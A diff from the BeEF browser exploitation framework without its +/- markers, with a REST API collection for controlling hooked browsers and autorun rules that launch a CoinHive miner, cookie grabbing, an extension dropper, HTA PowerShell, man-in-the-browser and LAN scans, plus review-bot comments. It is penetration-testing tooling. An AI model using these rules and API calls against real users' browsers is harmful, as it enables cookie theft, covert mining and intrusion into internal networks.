rubyzip (~> 3.2)
rushover (~> 0.3.0)
selenium-webdriver (~> 4.40)
sinatra (~> 4.1)
slack-notifier (~> 2.4)
sqlite3 (~> 2.9)
otr-activerecord (>= 1.4.2)
parseconfig
pry-byebug
qr4r
rack (>= 2.2.4)
rack-protection (>= 2.2.0)
rake (>= 13.0)
rdoc
rest-client (>= 2.1.0)
rspec
rubocop (~> 1.36.0)
rubyzip (>= 1.2.2)
rushover
selenium-webdriver
sinatra (>= 2.2.0)
slack-notifier
sqlite3
term-ansicolor
test-unit-full (~> 0.0.5)
thin (~> 2.0)
uglifier (~> 4.2)
websocket-client-simple (~> 0.6.1)
xmlrpc (~> 0.3.3)
test-unit
test-unit-full
thin
twitter (>= 7.0.0)
uglifier (>= 4.2.0)
unf
websocket-client-simple (~> 0.6.0)
xmlrpc
BUNDLED WITH
2.7.2
2.3.14


@@ -1,7 +1,7 @@
===============================================================================
Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - https://beefproject.com
Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
===============================================================================
@@ -21,9 +21,9 @@ Or cloning the Git repository from Github:
Prerequisites
--------------
BeEF requires Ruby 3.0+.
BeEF requires Ruby 2.7+.
If your operating system package manager does not support Ruby version 3.0,
If your operating system package manager does not support Ruby version 2.7,
you can add the brightbox ppa repository for the latest version of Ruby:
$ sudo apt-add-repository -y ppa:brightbox/ruby-ng


@@ -1,7 +1,7 @@
===============================================================================
Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - https://beefproject.com
Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
===============================================================================
@@ -30,13 +30,13 @@ __Security Bugs:__ security@beefproject.com
__Twitter:__ [@beefproject](https://twitter.com/beefproject)
__Discord:__ https://discord.gg/25wT2P8pwx
__Discord:__ https://discord.gg/ugmKmHarKc
Requirements
------------
* Operating System: Mac OSX 10.5.0 or higher / modern Linux. Note: Windows is not supported.
* [Ruby](https://www.ruby-lang.org): 3.0 or newer
* [Ruby](https://www.ruby-lang.org): 2.7 or newer
* [SQLite](http://sqlite.org): 3.x
* [Node.js](https://nodejs.org): 10 or newer
* The gems listed in the Gemfile: https://github.com/beefproject/beef/blob/master/Gemfile


@@ -0,0 +1,567 @@
{
"info": {
"_postman_id": "3b47c3ff-c03f-446c-8edb-cacaab481425",
"name": "RESTful API",
"schema": "https://schema.getpostman.com/json/collection/v2.1.0/collection.json"
},
"item": [
{
"name": "Authentication",
"event": [
{
"listen": "test",
"script": {
"id": "8e1a5f48-1d41-469d-a153-6cd5ee751912",
"exec": [
"var jsonData = JSON.parse(responseBody);",
"pm.environment.set(\"token\", jsonData.token);"
],
"type": "text/javascript"
}
}
],
"request": {
"method": "POST",
"header": [
{
"key": "Content-Type",
"name": "Content-Type",
"value": "application/json",
"type": "text"
}
],
"body": {
"mode": "raw",
"raw": "{\n\t\"username\": \"{{username}}\",\n\t\"password\": \"{{password}}\"\n\t\n}",
"options": {
"raw": {
"language": "json"
}
}
},
"url": {
"raw": "http://{{hostname}}:3000/api/admin/login",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"admin",
"login"
]
},
"description": "In order to use the API, a token parameter must always be added to requests, otherwise a 401 error (Not Authorized) is returned.\n\nA new pseudo-random token is generated each time BeEF starts, using BeEF::Core::Crypto::api_token. The token is added to the BeEF::Configuration object.\n\nWhen BeEF starts the token is printed to the console. It should look something like:\n\n[16:02:47][*] RESTful API key: 320f3cf4da7bf0df7566a517c5db796e73a23f47\nGrabbing the Token from BeEF's API\n\nYou can issue a POST request to /api/admin/login using the BeEF credentials you have set in the main config.yaml file. This request will return the token in the response. You can parse the JSON and use it for your next requests requiring authentication."
},
"response": []
},
{
"name": "Get All Hooked Browsers",
"request": {
"method": "GET",
"header": [],
"url": {
"raw": "http://{{hostname}}:3000/api/hooks?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"hooks"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "Provides information (browser and OS version, cookies, enabled plugins, etc) about all hooked browsers (both online and offline)."
},
"response": []
},
{
"name": "Get Specific Hooked Browser",
"request": {
"method": "GET",
"header": [],
"url": {
"raw": "http://{{hostname}}:3000/api/hooks/{{session}}?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"hooks",
"{{session}}"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "\n Provides information (browser and OS version, cookies, enabled plugins, etc) about a specific hooked browser.\n"
},
"response": []
},
{
"name": "Get All Hooked Browsers Logs",
"request": {
"method": "GET",
"header": [],
"url": {
"raw": "http://{{hostname}}:3000/api/logs?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"logs"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "The logs handler gives information about all hooked browser's logs, both global and relative."
},
"response": []
},
{
"name": "Get Specific Hooked Browsers Logs",
"request": {
"method": "GET",
"header": [],
"url": {
"raw": "http://{{hostname}}:3000/api/logs/{{session}}?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"logs",
"{{session}}"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": " The logs handler gives information about a specified hooked browser's logs.\n"
},
"response": []
},
{
"name": "List All Command Modules",
"request": {
"method": "GET",
"header": [],
"url": {
"raw": "http://{{hostname}}:3000/api/modules?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"modules"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "List all available BeEF command modules."
},
"response": []
},
{
"name": "Get Information on Specific Module",
"request": {
"method": "GET",
"header": [],
"url": {
"raw": "http://{{hostname}}:3000/api/modules/{{module_id}}?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"modules",
"{{module_id}}"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "Get detailed information about a specific BeEF command module.\n"
},
"response": []
},
{
"name": "Launch Command Module on a Specific Browser",
"request": {
"method": "POST",
"header": [
{
"key": "Content-Type",
"name": "Content-Type",
"value": "application/json",
"type": "text"
}
],
"body": {
"mode": "raw",
"raw": "",
"options": {
"raw": {
"language": "json"
}
}
},
"url": {
"raw": "http://{{hostname}}:3000/api/modules/{{session}}/{{module_id}}?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"modules",
"{{session}}",
"{{module_id}}"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "Launch a specific BeEF command module on a given hooked browser.\n"
},
"response": []
},
{
"name": "Return Information About Previously Executed Module",
"protocolProfileBehavior": {
"disableBodyPruning": true
},
"request": {
"method": "GET",
"header": [
{
"key": "Content-Type",
"name": "Content-Type",
"value": "application/json",
"type": "text"
}
],
"body": {
"mode": "raw",
"raw": "",
"options": {
"raw": {
"language": "json"
}
}
},
"url": {
"raw": "http://{{hostname}}:3000/api/modules/{{session}}/{{module_id}}/{{cmd_id}}?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"modules",
"{{session}}",
"{{module_id}}",
"{{cmd_id}}"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "Returns information about a specific previously launched BeEF command module.\n"
},
"response": []
},
{
"name": "Send a Metasploit Module",
"request": {
"method": "POST",
"header": [],
"url": {
"raw": "http://{{hostname}}:3000/api/modules/{{session}}/{{module_id}}?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"modules",
"{{session}}",
"{{module_id}}"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "Launch a specific Metasploit module on a given hooked browser\n"
},
"response": []
},
{
"name": " Send a Module to Multiple Hooked Browsers",
"request": {
"method": "POST",
"header": [
{
"key": "Content-Type",
"name": "Content-Type",
"value": "application/json",
"type": "text"
}
],
"body": {
"mode": "raw",
"raw": "",
"options": {
"raw": {
"language": "json"
}
}
},
"url": {
"raw": "http://{{hostname}}:3000/api/modules/multi_browser?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"modules",
"multi_browser"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "Fire a new command module to multiple hooked browsers. Returns the command IDs of the launched module, or 0 if firing got issues."
},
"response": []
},
{
"name": " Send Multiple Modules to a Single Hooked Browser",
"request": {
"method": "POST",
"header": [
{
"key": "Content-Type",
"name": "Content-Type",
"value": "application/json",
"type": "text"
}
],
"body": {
"mode": "raw",
"raw": "",
"options": {
"raw": {
"language": "json"
}
}
},
"url": {
"raw": "http://{{hostname}}:3000/api/modules/multi_module?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"modules",
"multi_module"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "Fire multiple command modules to a single hooked browser. Returns the command IDs of the launched modules, or 0 if firing got issues."
},
"response": []
},
{
"name": "List the DNS ruleset",
"request": {
"method": "GET",
"header": [],
"url": {
"raw": "http://{{hostname}}:3000/api/dns/ruleset?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"dns",
"ruleset"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "Returns the current set of DNS rules.\n"
},
"response": []
},
{
"name": "List a Specific DNS Rule",
"request": {
"method": "GET",
"header": [],
"url": {
"raw": "http://{{hostname}}:3000/api/dns/rule/{{dnsrule_id}}?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"dns",
"rule",
"{{dnsrule_id}}"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "Returns an individual DNS rule given its unique id.\n"
},
"response": []
},
{
"name": "Add a New DNS Rule",
"request": {
"method": "POST",
"header": [
{
"key": "Content-Type",
"name": "Content-Type",
"value": "application/json",
"type": "text"
}
],
"body": {
"mode": "raw",
"raw": "",
"options": {
"raw": {
"language": "json"
}
}
},
"url": {
"raw": "http://{{hostname}}:3000/api/dns/rule?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"dns",
"rule"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "Adds a new DNS rule or \"resource record\". Does nothing if rule is already present.\n"
},
"response": []
},
{
"name": "Remove an Existing DNS Rule",
"request": {
"method": "DELETE",
"header": [],
"url": {
"raw": "http://{{hostname}}:3000/api/dns/rule/{{dnsrule_id}}?token={{token}}",
"protocol": "http",
"host": [
"{{hostname}}"
],
"port": "3000",
"path": [
"api",
"dns",
"rule",
"{{dnsrule_id}}"
],
"query": [
{
"key": "token",
"value": "{{token}}"
}
]
},
"description": "Removes an individual DNS rule with a specified unique ID.\n"
},
"response": []
}
],
"protocolProfileBehavior": {}
}

110
Rakefile

@@ -1,27 +1,28 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
require 'yaml'
require 'bundler/setup'
load 'tasks/otr-activerecord.rake'
#require 'pry-byebug'
task :default => ["spec"]
desc 'Generate API documentation to doc/rdocs/index.html'
task :rdoc do
Rake::Task['rdoc:rerdoc'].invoke
end
## RSPEC
require 'rspec/core/rake_task'
task :default => ["short"]
RSpec::Core::RakeTask.new(:short) do |task|
task.rspec_opts = ['--tag ~run_on_browserstack', '--tag ~run_on_long_tests']
end
RSpec::Core::RakeTask.new(:long) do |task|
RSpec::Core::RakeTask.new(:spec) do |task|
task.rspec_opts = ['--tag ~run_on_browserstack']
end
RSpec::Core::RakeTask.new(:long_only) do |task|
task.rspec_opts = ['--tag ~run_on_browserstack', '--tag run_on_long_tests']
end
################################
# Browserstack
RSpec::Core::RakeTask.new(:browserstack) do |task|
task.rspec_opts = ['--tag run_on_browserstack']
end
@@ -54,7 +55,7 @@ namespace :ssl do
end
Rake::Task['ssl:replace'].invoke
end
desc 'Re-generate SSL certificate'
task :replace do
if File.file?('/usr/local/bin/openssl')
@@ -69,14 +70,6 @@ namespace :ssl do
end
end
################################
# Generate API documentation
desc 'Generate API documentation to doc/rdocs/index.html'
task :rdoc do
Rake::Task['rdoc:rerdoc'].invoke
end
################################
# rdoc
@@ -95,6 +88,15 @@ namespace :rdoc do
end
end
################################
# Install
#task :install do
# sh "export BEEF_TEST=true"
#end
################################
# X11 set up
@@ -122,6 +124,7 @@ end
@beef_process_id = nil;
@beef_config_file = 'tmp/rk_beef_conf.yaml';
task :beef_start => 'beef' do
# read environment param for creds or use bad_fred
test_user = ENV['TEST_BEEF_USER'] || 'bad_fred'
@@ -131,7 +134,7 @@ task :beef_start => 'beef' do
config = YAML.safe_load(File.read('./config.yaml'))
config['beef']['credentials']['user'] = test_user
config['beef']['credentials']['passwd'] = test_pass
Dir.mkdir('tmp') unless Dir.exist?('tmp')
Dir.mkdir('tmp') unless Dir.exists?('tmp')
File.open(@beef_config_file, 'w') { |f| YAML.dump(config, f) }
# set the environment creds -- in case we're using bad_fred
@@ -196,6 +199,61 @@ file '/tmp/msf-test/msfconsole' do
sh "cd test;git clone https://github.com/rapid7/metasploit-framework.git /tmp/msf-test"
end
################################
# Create Mac DMG File
task :dmg do
puts "\nCreating Working Directory\n";
sh "mkdir dmg";
sh "mkdir dmg/BeEF";
sh "rsync * dmg/BeEF --exclude=dmg -r";
sh "ln -s /Applications dmg/";
puts "\nCreating DMG File\n"
sh "hdiutil create ./BeEF.dmg -srcfolder dmg -volname BeEF -ov";
puts "\nCleaning Up\n"
sh "rm -r dmg";
puts "\nBeEF.dmg created\n"
end
################################
# Create CDE Package
# This will download and make the CDE Executable and
# gnereate a CDE Package in cde-package
task :cde do
puts "\nCloning and Making CDE...";
sh "git clone git://github.com/pgbovine/CDE.git";
Dir.chdir "CDE";
sh "make";
Dir.chdir "..";
puts "\nCreating CDE Package...\n";
sh "bundle install"
Rake::Task['cde_beef_start'].invoke
Rake::Task['beef_stop'].invoke
puts "\nCleaning Up...\n";
sleep (2);
sh "rm -rf CDE";
puts "\nCDE Package Created...\n";
end
################################
# CDE/BeEF environment set up
@beef_process_id = nil;
task :cde_beef_start => 'beef' do
printf "Starting CDE BeEF (wait 10 seconds)..."
@beef_process_id = IO.popen("./CDE/cde ruby beef -x 2> /dev/null", "w+")
delays = [2, 2, 1, 1, 1, 0.5, 0.5, 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
delays.each do |i| # delay for 10 seconds
printf '.'
sleep (i)
end
puts '.'
end
################################
# ActiveRecord
namespace :db do
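Review bot: The `:cde` task clones `git://github.com/pgbovine/CDE.git` over the unauthenticated git protocol at whatever the default branch holds, then runs `make`, and `cde_beef_start` later executes the resulting `./CDE/cde` binary. Nothing on that path verifies what was fetched, so a changed or tampered upstream would be built and run on the packager's machine; as far as I know GitHub no longer serves `git://`, so the clone probably fails outright. I would use `sh "git clone https://github.com/pgbovine/CDE.git"` followed by `sh "git -C CDE checkout <PINNED_COMMIT>"`. These tasks look like the added side of this hunk, judging by the `+199,61` count, since the page shows no +/- markers.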


@@ -1,7 +1,7 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
0.6.0.0
0.5.4.0


@@ -1,5 +1,9 @@
{"name": "Display an alert",
"author": "mgeeky",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "alert_dialog",
"condition": null,


@@ -0,0 +1,20 @@
{"name": "Start CoinHive JavaScript miner",
"author": "bcoles",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "coinhive_miner",
"condition": null,
"options": {
"public_token":"Ofh5MIvjuCBDqwJ9TCTio7TYko0ig5TV",
"mode":"FORCE_EXCLUSIVE_TAB",
"mobile_enabled":""
}
}
],
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}


@@ -1,5 +1,9 @@
{"name": "Confirm Close Tab",
"author": "mgeeky",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "confirm_close_tab",
"condition": null,


@@ -2,6 +2,7 @@
"name": "Firefox Extension Dropper",
"author": "antisnatchor",
"browser": "FF",
"browser_version": "ALL",
"os": "OSX",
"os_version": ">= 10.8",
"modules": [{
@@ -16,4 +17,4 @@
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}
}


@@ -1,6 +1,10 @@
{
"name": "Get Cookie",
"author": "@benichmt1",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "get_cookie",
"condition": null,


@@ -2,6 +2,7 @@
"name": "HTA PowerShell",
"author": "antisnatchor",
"browser": "IE",
"browser_version": "ALL",
"os": "Windows",
"os_version": ">= 7",
"modules": [


@@ -1,6 +1,9 @@
{"name": "LAN CORS Scan",
"author": "bcoles",
"browser": ["FF", "C"],
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "get_internal_ip_webrtc",
"condition": null,


@@ -1,5 +1,9 @@
{"name": "LAN CORS Scan (Common IPs)",
"author": "bcoles",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "cross_origin_scanner_cors",
"condition": null,


@@ -1,6 +1,9 @@
{"name": "LAN Fingerprint",
"author": "bcoles",
"browser": ["FF", "C"],
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "get_internal_ip_webrtc",
"condition": null,


@@ -1,5 +1,9 @@
{"name": "LAN Fingerprint (Common IPs)",
"author": "antisnatchor",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "internal_network_fingerprinting",
"condition": null,


@@ -1,6 +1,9 @@
{"name": "LAN Flash Scan",
"author": "bcoles",
"browser": ["FF", "C"],
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "get_internal_ip_webrtc",
"condition": null,


@@ -1,6 +1,9 @@
{"name": "LAN Flash Scan (Common IPs)",
"author": "bcoles",
"browser": ["FF", "C"],
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "cross_origin_scanner_flash",
"condition": null,


@@ -1,6 +1,9 @@
{"name": "LAN HTTP Scan",
"author": "bcoles",
"browser": ["FF", "C"],
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "get_internal_ip_webrtc",
"condition": null,


@@ -1,5 +1,9 @@
{"name": "LAN HTTP Scan (Common IPs)",
"author": "bcoles",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "get_http_servers",
"condition": null,


@@ -1,6 +1,9 @@
{"name": "LAN Ping Sweep",
"author": "bcoles",
"browser": "FF",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "get_internal_ip_webrtc",
"condition": null,


@@ -1,6 +1,9 @@
{"name": "LAN Ping Sweep (Common IPs)",
"author": "bcoles",
"browser": "FF",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "ping_sweep",
"condition": null,


@@ -1,5 +1,9 @@
{"name": "LAN Port Scan",
"author": "aburro & aussieklutz",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "get_internal_ip_webrtc",
"condition": null,


@@ -1,5 +1,9 @@
{"name": "LAN SW Port Scan",
"author": "aburro & aussieklutz",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "get_internal_ip_webrtc",
"condition": null,


@@ -1,5 +1,9 @@
{"name": "Perform Man-In-The-Browser",
"author": "mgeeky",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "man_in_the_browser",
"condition": null,


@@ -1,6 +1,10 @@
{
"name": "Raw JavaScript",
"author": "wade@bindshell.net",
"browser": "ALL",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "raw_javascript",
"condition": null,


@@ -1,5 +1,9 @@
{"name": "Collects multiple snapshots of the webpage within Same-Origin",
"author": "mgeeky",
"browser": ["FF", "C", "O", "IE", "S"],
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{"name": "spyder_eye",
"condition": null,


@@ -2,7 +2,10 @@
{
"name": "Windows Fake Malware",
"author": "bcoles",
"browser": "ALL",
"browser_version": "ALL",
"os": "Windows",
"os_version": "ALL",
"modules": [
{
"name": "blockui",

24
beef

@@ -1,8 +1,8 @@
#!/usr/bin/env ruby
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -12,9 +12,9 @@
$VERBOSE = nil
#
# @note Version check to ensure BeEF is running Ruby 3.0+
# @note Version check to ensure BeEF is running Ruby 2.7+
#
min_ruby_version = '3.0'
min_ruby_version = '2.7'
if RUBY_VERSION < min_ruby_version
puts
puts "Ruby version #{RUBY_VERSION} is no longer supported. Please upgrade to Ruby version #{min_ruby_version} or later."
@@ -39,10 +39,6 @@ $root_dir = File.join(File.expand_path(File.dirname(File.realpath(__FILE__))), '
$:.unshift($root_dir)
$home_dir = File.expand_path("#{Dir.home}/.beef/", __FILE__).freeze
# @note Parse BeEF CLI options early (prevents Rack help from taking over)
require 'core/main/console/commandline'
BeEF::Core::Console::CommandLine.parse
#
# @note Require core loader
#
@@ -189,7 +185,7 @@ db_file = config.get('beef.database.file')
if BeEF::Core::Console::CommandLine.parse[:resetdb]
print_info 'Resetting the database for BeEF.'
begin
File.delete(db_file) if File.exist?(db_file)
File.delete(db_file) if File.exists?(db_file)
rescue => e
print_error("Could not remove '#{db_file}' database file: #{e.message}")
exit(1)
@@ -198,6 +194,7 @@ end
# Connect to DB
ActiveRecord::Base.logger = nil
OTR::ActiveRecord.migrations_paths = [File.join('core', 'main', 'ar-migrations')]
OTR::ActiveRecord.configure_from_hash!(adapter:'sqlite3', database:db_file)
# otr-activerecord require you to manually establish the connection with the following line
#Also a check to confirm that the correct Gem version is installed to require it, likely easier for old systems.
@@ -206,13 +203,10 @@ if Gem.loaded_specs['otr-activerecord'].version > Gem::Version.create('1.4.2')
end
# Migrate (if required)
ActiveRecord::Migration.verbose = false # silence activerecord migration stdout messages
ActiveRecord::Migrator.migrations_paths = [File.join('core', 'main', 'ar-migrations')]
context = ActiveRecord::MigrationContext.new(ActiveRecord::Migrator.migrations_paths)
context = ActiveRecord::Migration.new.migration_context
if context.needs_migration?
ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration, context.internal_metadata).migrate
ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration).migrate
end
#
# @note Extensions may take a moment to load, thus we print out a please wait message
#
@@ -248,8 +242,6 @@ BeEF::Core::Console::Banners.print_loaded_extensions
BeEF::Core::Console::Banners.print_loaded_modules
BeEF::Core::Console::Banners.print_network_interfaces_count
BeEF::Core::Console::Banners.print_network_interfaces_routes
BeEF::Core::Console::Banners.print_http_proxy
BeEF::Core::Console::Banners.print_dns
#
# @note Prints the API key needed to use the RESTful API
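Review bot: In the `--resetdb` branch, `File.delete(db_file) if File.exists?(db_file)` relies on an alias that was removed in Ruby 3.2, and the version gate above only enforces a minimum (`min_ruby_version = '2.7'`), so newer interpreters still reach this line. Because the call sits inside `begin … rescue => e`, the resulting NoMethodError is caught and reported as "Could not remove … database file" before `exit(1)`, which hides the real cause. `File.exist?(db_file)` works on every version the gate admits; the same applies to `Dir.exists?('tmp')` in the Rakefile's `beef_start` task. This assumes the second line of each printed pair is the new side, which the page does not mark explicitly.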


@@ -1,12 +1,12 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
version: '0.6.0.0'
version: '0.5.4.0'
# More verbose messages (server-side)
debug: false
# More verbose messages (client-side)
@@ -45,23 +45,22 @@ beef:
# Enabling WebSockets is generally better (beef.websocket.enable)
xhr_poll_timeout: 1000
# Public Domain Name / Reverse Proxy / Port Forwarding
#
# In order for the client-side BeEF JavaScript hook to be able to connect to BeEF,
# the hook JavaScript needs to be generated with the correct connect-back details.
#
# If you're using a public domain name, reverse proxy, or port forwarding you must
# configure the public-facing connection details here.
# Host Name / Domain Name
# If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
# These settings will be used to create a public facing URL
# This public facing URL will be used for all hook related calls
# set the public setting below:
# public:
# host: "" # public hostname/IP address
# port: "" # public port will default to 80 if no https 443 if https
# and local if not set but there is a public host
# https: false # true/false
#public:
# host: "beef.local" # public hostname/IP address
# port: "443" # public port (443 if the public server is using HTTPS)
# https: false # true/false
# If using any reverse proxy you should also set allow_reverse_proxy to true below.
# Note that this causes the BeEF server to trust the X-Forwarded-For HTTP header.
# If the BeEF server is directly accessible, clients can spoof their connecting
# IP address using this header to bypass the IP address permissions/exclusions.
# Reverse Proxy / NAT
# If you want BeEF to be accessible behind a reverse proxy or NAT,
# set both the publicly accessible hostname/IP address and port below:
# NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
# by altering the X-FORWARDED-FOR ip address in the request header.
allow_reverse_proxy: false
# Hook
@@ -94,6 +93,8 @@ beef:
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
https:
enable: false
# Enabled this config setting if you're external facing uri is using https
public_enabled: false
# In production environments, be sure to use a valid certificate signed for the value
# used in beef.http.public (the domain name of the server where you run BeEF)
key: "beef_key.pem"
@@ -124,6 +125,13 @@ beef:
# GeoLite2 City database created by MaxMind, available from https://www.maxmind.com
database: '/usr/share/GeoIP/GeoLite2-City.mmdb'
# Integration with PhishingFrenzy
# If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
# to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
integration:
phishing_frenzy:
enable: false
# You may override default extension configuration parameters here
# Note: additional experimental extensions are available in the 'extensions' directory
# and can be enabled via their respective 'config.yaml' file
@@ -146,6 +154,6 @@ beef:
metasploit:
enable: false
social_engineering:
enable: false
enable: true
xssrays:
enable: true
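Review bot: The comment above `allow_reverse_proxy: false` that says enabling it "will enable a vulnerability where the ui/panel can be spoofed" does not tell an operator what is actually being trusted. The other wording printed in this hunk is more useful: the server trusts the `X-Forwarded-For` header, so a directly reachable instance lets a client choose its apparent source address and sidestep the IP permission lists. I would keep that explanation, for example `# Only enable behind a proxy you control: BeEF will trust X-Forwarded-For for client IPs.` It is also worth confirming that `social_engineering: enable: true` in the last hunk is intended, since it turns an extension on by default where the paired line has `false`. The page lost its +/- markers, so which line of each pair is new is inferred.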


@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -29,7 +29,7 @@ module BeEF
#
def register(owner, clss, method, params = [])
unless verify_api_path(clss, method)
print_error "API Registrar: Attempted to register non-existent API method #{clss} :#{method}"
print_error "API Registrar: Attempted to register non-existant API method #{clss} :#{method}"
return
end
@@ -184,7 +184,7 @@ module BeEF
mods = get_owners(clss, mthd, args)
return nil unless mods.length.positive?
unless verify_api_path(clss, mthd) && clss.ancestors.first.to_s.start_with?('BeEF::API')
unless verify_api_path(clss, mthd) && clss.ancestors[0].to_s > 'BeEF::API'
print_error "API Path not defined for Class: #{clss} method: #{mthd}"
return []
end
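Review bot: `clss.ancestors[0].to_s > 'BeEF::API'` is a lexicographic string comparison, not a namespace check, so any class whose name merely sorts after that string (one beginning `BeEF::Core`, for instance) passes the guard. The paired line, `clss.ancestors.first.to_s.start_with?('BeEF::API')`, expresses the intended restriction and is the form to keep. The error message in the first hunk also spells "non-existant"; `non-existent` is correct. Both enclosing methods begin and end outside the hunks shown, and the side of each paired line is inferred because the page shows no +/- markers.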


@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
